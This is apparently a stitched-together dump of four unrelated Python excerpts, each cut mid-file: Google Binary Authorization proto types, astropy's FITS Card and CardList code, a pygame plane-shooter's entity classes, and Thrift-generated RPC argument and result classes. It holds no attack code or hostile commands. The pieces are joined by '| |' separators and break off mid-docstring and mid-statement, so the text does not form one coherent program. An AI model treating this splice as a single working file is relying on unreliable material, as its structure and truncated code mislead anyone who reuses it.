Optional. A descriptive comment. This field
may be updated. The field may be displayed in
chooser dialogs.
user_owned_grafeas_note (google.cloud.binaryauthorization_v1.types.UserOwnedGrafeasNote):
This specifies how an attestation will be
read, and how it will be used during policy
enforcement.
update_time (google.protobuf.timestamp_pb2.Timestamp):
Output only. Time when the attestor was last
updated.
"""
name = proto.Field(
proto.STRING,
number=1,
)
description = proto.Field(
proto.STRING,
number=6,
)
user_owned_grafeas_note = proto.Field(
proto.MESSAGE,
number=3,
oneof='attestor_type',
message='UserOwnedGrafeasNote',
)
update_time = proto.Field(
proto.MESSAGE,
number=4,
message=timestamp_pb2.Timestamp,
)
class UserOwnedGrafeasNote(proto.Message):
r"""An [user owned Grafeas
note][google.cloud.binaryauthorization.v1.UserOwnedGrafeasNote]
references a Grafeas Attestation.Authority Note created by the user.
Attributes:
note_reference (str):
Required. The Grafeas resource name of a
Attestation.Authority Note, created by the user, in the
format: ``projects/*/notes/*``. This field may not be
updated.
An attestation by this attestor is stored as a Grafeas
Attestation.Authority Occurrence that names a container
image and that links to this Note. Grafeas is an external
dependency.
public_keys (Sequence[google.cloud.binaryauthorization_v1.types.AttestorPublicKey]):
Optional. Public keys that verify
attestations signed by this attestor. This
field may be updated.
If this field is non-empty, one of the specified
public keys must verify that an attestation was
signed by this attestor for the image specified
in the admission request.
If this field is empty, this attestor always
returns that no valid attestations exist.
delegation_service_account_email (str):
Output only. This field will contain the service account
email address that this Attestor will use as the principal
when querying Container Analysis. Attestor administrators
must grant this service account the IAM role needed to read
attestations from the [note_reference][Note] in Container
Analysis (``containeranalysis.notes.occurrences.viewer``).
This email address is fixed for the lifetime of the
Attestor, but callers should not make any other assumptions
about the service account email; future versions may use an
email based on a different naming pattern.
"""
note_reference = proto.Field(
proto.STRING,
number=1,
)
public_keys = proto.RepeatedField(
proto.MESSAGE,
number=2,
message='AttestorPublicKey',
)
delegation_service_account_email = proto.Field(
proto.STRING,
number=3,
)
class PkixPublicKey(proto.Message):
r"""A public key in the PkixPublicKey format (see
https://tools.ietf.org/html/rfc5280#section-4.1.2.7 for
details). Public keys of this type are typically textually
encoded using the PEM format.
Attributes:
public_key_pem (str):
A PEM-encoded public key, as described in
https://tools.ietf.org/html/rfc7468#section-13
signature_algorithm (google.cloud.binaryauthorization_v1.types.PkixPublicKey.SignatureAlgorithm):
The signature algorithm used to verify a message against a
signature using this key. These signature algorithm must
match the structure and any object identifiers encoded in
``public_key_pem`` (i.e. this algorithm must match that of
the public key).
"""
class SignatureAlgorithm(proto.Enum):
r"""Represents a signature algorithm and other information
necessary to verify signatures with a given public key. This is
based primarily on the public key types supported by Tink's
PemKeyType, which is in turn based on KMS's supported signing
algorithms. See https://cloud.google.com/kms/docs/algorithms. In
the future, BinAuthz might support additional public key types
independently of Tink and/or KMS.
"""
_pb_options = {'allow_alias': True}
SIGNATURE_ALGORITHM_UNSPECIFIED = 0
RSA_PSS_2048_SHA256 = 1
RSA_PSS_3072_SHA256 = 2
RSA_PSS_4096_SHA256 = 3
RSA_PSS_4096_SHA512 = 4
RSA_SIGN_PKCS1_2048_SHA256 = 5
RSA_SIGN_PKCS1_3072_SHA256 = 6
RSA_SIGN_PKCS1_4096_SHA256 = 7
RSA_SIGN_PKCS1_4096_SHA512 = 8
ECDSA_P256_SHA256 = 9
EC_SIGN_P256_SHA256 = 9
ECDSA_P384_SHA384 = 10
EC_SIGN_P384_SHA384 = 10
ECDSA_P521_SHA512 = 11
EC_SIGN_P521_SHA512 = 11
public_key_pem = proto.Field(
proto.STRING,
number=1,
)
signature_algorithm = proto.Field(
proto.ENUM,
number=2,
enum=SignatureAlgorithm,
)
class AttestorPublicKey(proto.Message):
r"""An [attestor public
key][google.cloud.binaryauthorization.v1.AttestorPublicKey] that
will be used to verify attestations signed by this attestor.
Attributes:
comment (str):
Optional. A descriptive comment. This field
may be updated.
id (str):
The ID of this public key. Signatures verified by BinAuthz
must include the ID of the public | |
<reponame>xiaomi1122/astropy
# Licensed under a 3-clause BSD style license - see PYFITS.rst
import copy
import re
import warnings
import numpy as np
from .util import _str_to_num, _is_int, maketrans, translate, _words_group
from .verify import _Verify, _ErrList, VerifyError, VerifyWarning
from . import ENABLE_RECORD_VALUED_KEYWORD_CARDS, STRIP_HEADER_WHITESPACE
from ...extern.six import string_types
from ...utils import deprecated
from ...utils.exceptions import AstropyUserWarning, AstropyDeprecationWarning
__all__ = ['Card', 'CardList', 'create_card', 'create_card_from_string',
'upper_key', 'Undefined']
FIX_FP_TABLE = maketrans('de', 'DE')
FIX_FP_TABLE2 = maketrans('dD', 'eE')
CARD_LENGTH = 80
BLANK_CARD = ' ' * CARD_LENGTH
KEYWORD_LENGTH = 8 # The max length for FITS-standard keywords
VALUE_INDICATOR = '= ' # The standard FITS value indicator
HIERARCH_VALUE_INDICATOR = '=' # HIERARCH cards may use a shortened indicator
class Undefined(object):
"""Undefined value."""
def __init__(self):
# This __init__ is required to be here for Sphinx documentation
pass
UNDEFINED = Undefined()
class CardList(list):
"""
.. deprecated:: 0.1
`CardList` used to provide the list-like functionality for manipulating
a header as a list of cards. This functionality is now subsumed into
the `Header` class itself, so it is no longer necessary to create or
use `CardList`\s.
"""
def __init__(self, cards=[], keylist=None):
"""
Construct the `CardList` object from a list of `Card` objects.
`CardList` is now merely a thin wrapper around `Header` to provide
backwards compatibility for the old API. This should not be used for
any new code.
Parameters
----------
cards
A list of `Card` objects.
"""
warnings.warn(
'The CardList class has been deprecated; all its former '
'functionality has been subsumed by the Header class, so '
'CardList objects should not be directly created. See the '
'PyFITS 3.1.0 CHANGELOG for more details.',
AstropyDeprecationWarning)
# This is necessary for now to prevent a circular import
from .header import Header
# I'm not sure if they keylist argument here was ever really useful;
# I'm going to just say don't use it.
if keylist is not None:
raise ValueError(
'The keylist argument to CardList() is no longer supported.')
if isinstance(cards, Header):
self._header = cards
else:
self._header = Header(cards)
super(CardList, self).__init__(self._header.cards)
def __contains__(self, key):
return key in self._header
def __iter__(self):
return iter(self._header.cards)
def __getitem__(self, key):
"""Get a `Card` by indexing or by the keyword name."""
if self._header._haswildcard(key):
return [copy.copy(self._header._cards[idx])
for idx in self._header._wildcardmatch(key)]
elif isinstance(key, slice):
return CardList(self._header.cards[key])
idx = self._header._cardindex(key)
return self._header.cards[idx]
def __setitem__(self, key, value):
"""Set a `Card` by indexing or by the keyword name."""
if isinstance(value, tuple) and (1 < len(value) <= 3):
value = Card(*value)
if isinstance(value, Card):
idx = self._header._cardindex(key)
card = self._header.cards[idx]
if str(card) != str(value):
# Replace the existing card at this index by delete/insert
del self._header[idx]
self._header.insert(idx, value)
else:
raise ValueError('%s is not a Card' % str(value))
def __delitem__(self, key):
"""Delete a `Card` from the `CardList`."""
if key not in self._header._keyword_indices:
raise KeyError("Keyword '%s' not found." % key)
del self._header[key]
def __getslice__(self, start, end):
return CardList(self[slice(start, end)])
def __repr__(self):
"""Format a list of cards into a string."""
return str(self._header)
def __str__(self):
"""Format a list of cards into a printable string."""
return '\n'.join(str(card) for card in self)
@deprecated('0.1', alternative=':meth:`Header.copy`', pending=False)
def copy(self):
"""Make a (deep)copy of the `CardList`."""
return CardList(self._header.copy())
@deprecated('0.1', alternative=':meth:`Header.keys`', pending=False)
def keys(self):
"""
Return a list of all keywords from the `CardList`.
"""
return self._header.keys()
@deprecated('0.1', alternative=':meth:`Header.values`', pending=False)
def values(self):
"""
Return a list of the values of all cards in the `CardList`.
For ``RecordValuedKeywordCard`` objects, the value returned is
the floating point value, exclusive of the
``field_specifier``.
"""
return self._header.values()
@deprecated('0.1', alternative=':meth:`Header.append`', pending=False)
def append(self, card, useblanks=True, bottom=False):
"""
Append a `Card` to the `CardList`.
Parameters
----------
card : `Card` object
The `Card` to be appended.
useblanks : bool, optional
Use any *extra* blank cards?
If ``useblanks`` is `True`, and if there are blank cards directly
before ``END``, it will use this space first, instead of appending
after these blank cards, so the total space will not increase.
When ``useblanks`` is `False`, the card will be appended at the
end, even if there are blank cards in front of ``END``.
bottom : bool, optional
If `False` the card will be appended after the last non-commentary
card. If `True` the card will be appended after the last non-blank
card.
"""
self._header.append(card, useblanks=useblanks, bottom=bottom)
@deprecated('0.1', alternative=':meth:`Header.extend`', pending=False)
def extend(self, cards):
self._header.extend(cards)
@deprecated('0.1', alternative=':meth:`Header.insert`', pending=False)
def insert(self, idx, card, useblanks=True):
"""
Insert a `Card` to the `CardList`.
Parameters
----------
pos : int
The position (index, keyword name will not be allowed) to
insert. The new card will be inserted before it.
card : `Card` object
The card to be inserted.
useblanks : bool, optional
If ``useblanks`` is `True`, and if there are blank cards directly
before ``END``, it will use this space first, instead of appending
after these blank cards, so the total space will not increase.
When `useblanks` is `False`, the card will be appended at the end,
even if there are blank cards in front of ``END``.
"""
self._header.insert(idx, card, useblanks=useblanks)
@deprecated('0.1', alternative=':meth:`Header.remove`')
def remove(self, card):
del self._header[self.index(card)]
@deprecated('0.1', alternative=':meth:`Header.pop`')
def pop(self, index=-1):
return self._header.pop(index)
@deprecated('0.1', alternative=':meth:`Header.index`')
def index(self, card):
return self._header._cards.index(card)
@deprecated('0.1', alternative=':meth:`Header.count`')
def count(self, card):
return self._header._cards.count(card)
@deprecated('0.1', alternative=':meth:`Header.index`', pending=False)
def index_of(self, key, backward=False):
"""
Get the index of a keyword in the `CardList`.
Parameters
----------
key : str or int
The keyword name (a string) or the index (an integer).
backward : bool, optional
When `True`, search the index from the ``END``, i.e.,
backward.
Returns
-------
index : int
The index of the `Card` with the given keyword.
"""
# Backward is just ignored now, since the search is not linear anyways
if _is_int(key) or isinstance(key, basestring):
return self._header._cardindex(key)
else:
raise KeyError('Illegal key data type %s' % type(key))
@deprecated('0.1', alternative='``header[<wildcard_pattern>]``')
def filter_list(self, key):
"""
Construct a `CardList` that contains references to all of the cards in
this `CardList` that match the input key value including any special
filter keys (``*``, ``?``, and ``...``).
Parameters
----------
key : str
key value to filter the list with
Returns
-------
cardlist
A `CardList` object containing references to all the
requested cards.
"""
return CardList(self._header[key])
@deprecated('0.1', pending=False)
def count_blanks(self):
"""
Returns how many blank cards are *directly* before the ``END``
card.
"""
return self._header._countblanks()
class Card(_Verify):
length = CARD_LENGTH
"""The length of a Card image; should always be 80 for valid FITS files."""
# String for a FITS standard compliant (FSC) keyword.
_keywd_FSC_RE = re.compile(r'^[A-Z0-9_-]{0,%d}$' % KEYWORD_LENGTH)
# This will match any printable ASCII character excluding '='
_keywd_hierarch_RE = re.compile(r'^(?:HIERARCH +)?(?:^[ -<>-~]+ ?)+$',
re.I)
# A number sub-string, either an integer or a float in fixed or
# scientific notation. One for FSC and one for non-FSC (NFSC) format:
# NFSC allows lower case of DE for exponent, allows space between sign,
# digits, exponent sign, and exponents
_digits_FSC = r'(\.\d+|\d+(\.\d*)?)([DE][+-]?\d+)?'
_digits_NFSC = r'(\.\d+|\d+(\.\d*)?) *([deDE] *[+-]? *\d+)?'
_numr_FSC = r'[+-]?' + _digits_FSC
_numr_NFSC = r'[+-]? *' + _digits_NFSC
# This regex helps delete leading zeros from numbers, otherwise
# Python might evaluate them as octal values (this is not-greedy, however,
# so it may not strip leading zeros from a float, which is fine)
_number_FSC_RE = re.compile(r'(?P<sign>[+-])?0*?(?P<digt>%s)'
% _digits_FSC)
_number_NFSC_RE = re.compile(r'(?P<sign>[+-])? *0*?(?P<digt>%s)'
% _digits_NFSC)
# FSC commentary card string which must contain printable ASCII characters.
_ascii_text = r'[ -~]*$'
_comment_FSC_RE = re.compile(_ascii_text)
# Checks for a valid value/comment string. It returns a match object
# for a valid value/comment string.
# The valu group will return a match if a FITS string, boolean,
# number, or complex value is found, otherwise it will return
# None, meaning the keyword is undefined. The comment field will
# return a match if the comment separator is found, though the
# comment maybe an empty string.
_value_FSC_RE = re.compile(
r'(?P<valu_field> *'
r'(?P<valu>'
# The <strg> regex is not correct for all cases, but
# it comes pretty darn close. It appears to find the
# end of a string rather well, but will accept
# strings with an odd number of single quotes,
# instead of issuing an | |
<filename>Entities.py
import pygame, os, time
from Stage import *
from Sprites import *
from random import randint
class PlayerPlane:
def __init__(self, x, y):
self.sprite = pygame.image.load(os.path.join(os.getcwd(), "resources", "player.png"))
self.x = x
self.y = y
self.fuel = 3000
self.bombs = 30
self.score = 0
self.lives = 0
self.rect = self.sprite.get_rect()
self.rect.topleft = ((self.x, self.y))
self.name = []
self.vertspeed = 0
self.DiedOnFrame = 0
#Flags
self.ControlsEnabled = True
self.IsRespawning = False
self.IsInvincible = False
#Hitbox p/r lasers
self.hitbox = pygame.Rect((0,0), (50,20))
self.hitbox.center = self.rect.center
#Valeurs pour le respawn:
self.RespawnDuration = 150
self.InvincibilityDuration = 210
def Die(self, frame):
self.lives -= 1
self.fuel = 3000
self.bombs = 30
self.x = -380
self.y = int(height/2)
self.ControlsEnabled = False
self.IsRespawning = True
self.IsInvincible = True
self.DiedOnFrame = frame
Player = PlayerPlane(-100, int(height/2))
Bullets = []
EnemyBullets = []
class Bullet:
def __init__(self, x, y, horizspeed, vertspeed, firedby):
self.sprite = laser
self.rect = self.sprite.get_rect()
self.x = x
self.y = y
self.horizspeed = horizspeed
self.vertspeed = vertspeed
self.firedby = firedby
EnemyBalloons = []
class WeatherBalloon:
#<NAME> C'EST QUOI CE TRUC. On dirait des mines flottantes plus légères que l'air
def __init__(self, x, y, horizspeed):
self.sprite = balloon
self.rect = self.sprite.get_rect()
self.x = x
self.y = y
self.vertspeed = -1
self.horizspeed = horizspeed
self.maxvertspeed = randint(-5, -1)
self.firedby = "Enemy"
Bombs = []
EnemyBombs = []
class PlayerBombs:
def __init__(self, x, y, frame):
self.sprite = bomb
self.sprite = pygame.transform.scale(self.sprite, ((30,10)))
self.rect = self.sprite.get_rect()
self.x = x
self.y = y
self.width = self.rect.right - self.rect.left
self.height = self.rect.bottom - self.rect.top
self.droppedOnFrame = frame
class EnemyBomb:
def __init__(self, x, y, frame):
self.sprite = bomb
self.sprite = pygame.transform.flip(self.sprite, True, False)
self.sprite = pygame.transform.scale(self.sprite, ((30,10)))
self.rect = self.sprite.get_rect()
self.x = x
self.y = y
self.width = self.rect.right - self.rect.left
self.height = self.rect.bottom - self.rect.top
self.droppedOnFrame = frame
class ResupplyPlane:
def __init__(self):
self.sprite = pygame.image.load(os.path.join(os.getcwd(), "resources", "friendlyplane.png"))
self.x = -100
self.y = 50
self.WhereToDrop = 0
Friendlies = [ResupplyPlane()]
class CarePackage:
def __init__(self, x, y, vertspeed, sprite, points):
self.x = x
self.y = y
self.vertspeed = 2
self.sprite = sprite
self.rect = self.sprite.get_rect()
self.pointsawarded = points
Enemies = []
class EnemyPlane:
def __init__(self, y, frame):
self.sprite = pygame.image.load(os.path.join(os.getcwd(), "resources", "enemytest.png"))
self.rect = self.sprite.get_rect()
self.x = width + 100
self.y = y
self.horizspeed = -5
self.vertspeed = 0
self.rect.topleft = ((self.x, self.y))
self.width = self.rect.width
self.height = self.rect.height
self.FireOnFrame = frame + randint(60, 120)
self.hitpoints = 1
self.name = "Enemy"
def Behave(self, frame):
if self.x <= -100:
self.x = width + 100
self.y = randint(110, int((height * 5.9)/ 10))
if frame == self.FireOnFrame:
self.Fire(frame)
def Fire(self, frame):
EnemyBullets.append(Bullet(self.rect.left - 50, self.rect.centery -1, -10, 0, self.name))
self.FireOnFrame = frame + randint(60, 120)
def Die(self):
Player.score += 150
class EnemyWeirdPlane:
def __init__(self, y, frame):
self.sprite = pygame.image.load(os.path.join(os.getcwd(), "resources", "enemytest.png"))
self.sprite = pygame.transform.flip(self.sprite, True, False)
self.x = width + 100
self.y = y
self.horizspeed = 0
self.vertspeed = -3
self.rect = self.sprite.get_rect()
self.rect.topleft = ((self.x, self.y))
self.width = self.rect.width
self.height = self.rect.height
self.FireOnFrame = frame + randint(60, 120)
self.hitpoints = 1
self.name = "Enemy"
def Behave(self, frame):
if self.x >= width - 121:
if self.horizspeed >= -3 and frame % 10 == 0:
self.horizspeed -=1
elif self.horizspeed == -3:
pass
if self.x <= int(width/2) + 100:
if self.horizspeed <= 3 and frame % 10 == 0:
self.horizspeed += 1
if self.y <= 100 or self.y <= Player.y - 50:
if self.vertspeed <= 3 and frame % 10 == 0:
self.vertspeed += 1
if self.y >= bgLayerRect.top - 200 or self.y >= Player.y + 75:
if self.vertspeed >= -3 and frame % 10 == 0:
self.vertspeed -= 1
if frame == self.FireOnFrame:
self.Fire(frame)
def Fire(self, frame):
EnemyBalloons.append(WeatherBalloon(self.rect.left - 50, self.rect.centery -1, randint(-5, -1)))
self.FireOnFrame = frame + randint(30, 90)
def Die(self):
Player.score += 150
def CreateEnemies(ClassObject):
Enemies.append(ClassObject)
class ObjectiveTank:
def __init__(self):
self.sprite = tank
self.rect = self.sprite.get_rect()
self.rect.bottom = bgLayerRect.top
self.x = width + 100
self.y = self.rect.top
self.hitpoints = 5
self.speed = 0
self.width = self.rect.right - self.rect.left
self.height = self.rect.bottom - self.rect.top
Splosion = []
class Explosion:
def __init__(self, x, y, who, frame):
self.StartOnFrame = frame
self.x = x
self.y = y
self.who = who
self.width = 0
self.height = 0
self.sprite = pygame.image.load(os.path.join(os.getcwd(), "resources", "ExplosionFrame1.png"))
if who == "Bomb":
self.width = 30
self.height = 30
elif who == "Player":
self.width = 50
self.height = 50
self.sprite = pygame.transform.scale(self.sprite, (self.width, self.height))
def SpawnExplosion(x, y, who, frame):
Splosion.append(Explosion(x, y, who, frame))
class TOPSECRET:
def __init__(self, frame):
#self.sprite = vicviper
self.sprite = pygame.image.load(os.path.join(os.getcwd(), "resources", "secret", "vicviper.png"))
self.sprite = pygame.transform.flip(self.sprite, True, False)
self.name = "<NAME>"
self.hitpoints = 64
self.horizspeed = 0
self.vertspeed = 0
self.x = -1000
self.y = 150
self.rect = self.sprite.get_rect()
self.rect.topleft = ((self.x, self.y))
self.width = self.rect.width
self.height = self.rect.height
#Flags
self.status = "Spawning"
self.Cooldown = False
#Chrono
self.Timer = 0
self.BombOnFrame = 0
self.ShootOnFrame = 0
self.CooldownActivatedOnFrame = 0
self.Pattern = 0
self.ChargeASecondTime = False
def Behave(self, frame):
if self.status == "Spawning":
self.x += 10
if self.x >= width + 100:
self.status = "Idle"
self.horizspeed = -5
self.TimeAlive = 0
self.ShootOnFrame = frame + randint(20,30)
elif self.status == "Idle":
if self.x >= Player.rect.x + 25:
if self.horizspeed >= -5 and frame % 5 == 0:
self.horizspeed -= 1
elif self.horizspeed == -5:
pass
if self.x <= Player.x + 25:
if self.horizspeed <= 5 and frame % 5 == 0:
self.horizspeed += 1
if self.y <= int(height/2) or self.y <= Player.y + 25:
if self.vertspeed <= 6 and frame % 8 == 0:
self.vertspeed += 2
if self.y >= int(height/2) or self.y >= Player.y +25:
if self.vertspeed >= -6 and frame % 8 == 0:
self.vertspeed -= 2
if self.rect.bottom >= bgLayerRect.top:
self.rect.bottom = bgLayerRect.top
if self.status == "Idle" and Player.x >= self.x:
if frame == self.ShootOnFrame:
if self.hitpoints >= 50:
self.FireForwards(frame)
elif self.hitpoints < 50 and self.hitpoints >= 20:
self.FireDoubleForwards(frame)
elif self.hitpoints < 20:
self.FireTripleForwards(frame)
elif self.status == "Idle" and Player.x <= self.x:
if frame == self.ShootOnFrame:
if self.hitpoints >= 50:
self.FireBackwards(frame)
elif self.hitpoints < 50 and self.hitpoints >= 20:
self.FireDoubleBackwards(frame)
elif self.hitpoints < 20:
self.FireTripleBackwards(frame)
elif self.status == "Bombing":
self.y = 40
self.horizspeed = -5
if self.x <= width and self.x >= width - 6 and self.BombOnFrame == 0:
self.BombOnFrame = frame + 10
if self.x <= -100:
self.status = "Idle"
self.horizspeed = 5
self.y = Player.y + 25
Splosion.clear()
self.Timer = 0
self.BombOnFrame = 0
self.ShootOnFrame = frame + randint(20,35)
self.sprite = pygame.transform.flip(self.sprite, True, False)
elif self.status == "Charging":
if self.y == 0:
self.y = Player.y
else:
pass
self.vertspeed = 0
self.horizspeed = -20
if self.x <= -100:
self.status = "Idle"
self.horizspeed = 5
self.y = Player.y
Splosion.clear()
self.Timer = 0
self.BombOnFrame = 0
self.ShootOnFrame = frame + randint(20,35)
self.sprite = pygame.transform.flip(self.sprite, True, False)
elif self.status == "DoubleCharge":
if self.y == 0:
self.y = Player.y
else:
pass
self.vertspeed = 0
if self.ChargeASecondTime == False:
self.horizspeed = -20
else:
self.horizspeed = 20
if self.x < -150:
self.ChargeASecondTime = True
self.x = -100
self.y = Player.y
self.sprite = pygame.transform.flip(self.sprite, True, False)
if self.x >= width + 100 and self.ChargeASecondTime == True:
self.status = "Idle"
self.horizspeed = -5
self.y = Player.y
Splosion.clear()
self.Timer = 0
self.BombOnFrame = 0
self.ShootOnFrame = frame + randint(20,35)
self.ChargeASecondTime = False
self.Timer += 1
if self.Timer % 480 == 0 and self.status == "Idle":
self.status = "ExitScreen"
self.vertspeed = 0
if self.status == "ExitScreen" and self.x < width + 100:
self.horizspeed = 10
elif self.status == "ExitScreen" and self.x >= width + 100:
self.Pattern = randint(1, 3)
if self.Pattern == 1:
self.status = "Bombing"
self.x = width
self.sprite = pygame.transform.flip(self.sprite, True, False)
elif self.Pattern == 2:
self.status = "Charging"
self.y = 0
self.x = width
self.sprite = pygame.transform.flip(self.sprite, True, False)
elif self.Pattern == 3:
self.status = "DoubleCharge"
self.y = 0
self.x = width
self.sprite = pygame.transform.flip(self.sprite, True, False)
if self.status == "Bombing" and frame == self.BombOnFrame:
self.FireBombs(frame)
if frame >= self.CooldownActivatedOnFrame + 30:
self.Cooldown = False
def FireForwards(self, frame):
if Player.IsInvincible == False:
| |
problem
- arch
"""
def __init__(self, problem=None, arch=None,):
self.problem = problem
self.arch = arch
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.problem = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.arch = BinaryInputArchitecture()
self.arch.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('getMeasurements_args')
if self.problem is not None:
oprot.writeFieldBegin('problem', TType.STRING, 1)
oprot.writeString(self.problem.encode('utf-8') if sys.version_info[0] == 2 else self.problem)
oprot.writeFieldEnd()
if self.arch is not None:
oprot.writeFieldBegin('arch', TType.STRUCT, 2)
self.arch.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(getMeasurements_args)
getMeasurements_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'problem', 'UTF8', None, ), # 1
(2, TType.STRUCT, 'arch', [BinaryInputArchitecture, None], None, ), # 2
)
class getMeasurements_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype331, _size328) = iprot.readListBegin()
for _i332 in range(_size328):
_elem333 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.success.append(_elem333)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('getMeasurements_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRING, len(self.success))
for iter334 in self.success:
oprot.writeString(iter334.encode('utf-8') if sys.version_info[0] == 2 else iter334)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(getMeasurements_result)
getMeasurements_result.thrift_spec = (
(0, TType.LIST, 'success', (TType.STRING, 'UTF8', False), None, ), # 0
)
class getPanelScoresForArch_args(object):
"""
Attributes:
- problem
- arch
"""
def __init__(self, problem=None, arch=None,):
self.problem = problem
self.arch = arch
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.problem = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.arch = BinaryInputArchitecture()
self.arch.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('getPanelScoresForArch_args')
if self.problem is not None:
oprot.writeFieldBegin('problem', TType.STRING, 1)
oprot.writeString(self.problem.encode('utf-8') if sys.version_info[0] == 2 else self.problem)
oprot.writeFieldEnd()
if self.arch is not None:
oprot.writeFieldBegin('arch', TType.STRUCT, 2)
self.arch.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(getPanelScoresForArch_args)
getPanelScoresForArch_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'problem', 'UTF8', None, ), # 1
(2, TType.STRUCT, 'arch', [BinaryInputArchitecture, None], None, ), # 2
)
class getPanelScoresForArch_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype338, _size335) = iprot.readListBegin()
for _i339 in range(_size335):
_elem340 = iprot.readDouble()
self.success.append(_elem340)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('getPanelScoresForArch_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.DOUBLE, len(self.success))
for iter341 in self.success:
oprot.writeDouble(iter341)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(getPanelScoresForArch_result)
getPanelScoresForArch_result.thrift_spec = (
(0, TType.LIST, 'success', (TType.DOUBLE, None, False), None, ), # 0
)
class evaluateDataContinuityScore_args(object):
"""
Attributes:
- missionMeasurements
- historical_missionMeasurements
"""
def __init__(self, missionMeasurements=None, historical_missionMeasurements=None,):
self.missionMeasurements = missionMeasurements
self.historical_missionMeasurements = historical_missionMeasurements
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.missionMeasurements = []
(_etype345, _size342) = iprot.readListBegin()
for _i346 in range(_size342):
_elem347 = MissionMeasurements()
_elem347.read(iprot)
self.missionMeasurements.append(_elem347)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.historical_missionMeasurements = []
(_etype351, _size348) = iprot.readListBegin()
for _i352 in range(_size348):
_elem353 = MissionMeasurements()
_elem353.read(iprot)
